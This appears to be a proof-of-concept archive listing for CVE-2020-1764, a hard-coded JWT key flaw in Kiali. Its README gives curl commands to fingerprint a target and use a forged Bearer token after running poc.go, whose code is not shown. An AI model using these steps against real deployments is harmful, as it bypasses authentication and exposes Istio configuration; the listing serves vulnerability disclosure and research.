Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2020-1764 PoC — Kiali 信任管理问题漏洞

Source
Associated Vulnerability
Title:Kiali 信任管理问题漏洞 (CVE-2020-1764)
Description:A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration.
Description
Auth Bypass PoC for Kiali
Readme
# CVE-2020-1764 PoC

Auth bypass PoC for Kiali 0.4.0 to 1.15.0 using login auth strategy ([Security Bulletin](https://istio.io/latest/news/security/istio-security-2020-004/))

check version: `curl 'http://<IP>/api`

check auth strategy: `curl 'http://<IP>/api/auth/info'`

`go run ./poc.go`

`curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"`
File Snapshot

[4.0K] /data/pocs/3dcf4c9a485f2d322bc17d23e447648e9ee2d6fc ├── [ 424] poc.go └── [ 356] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →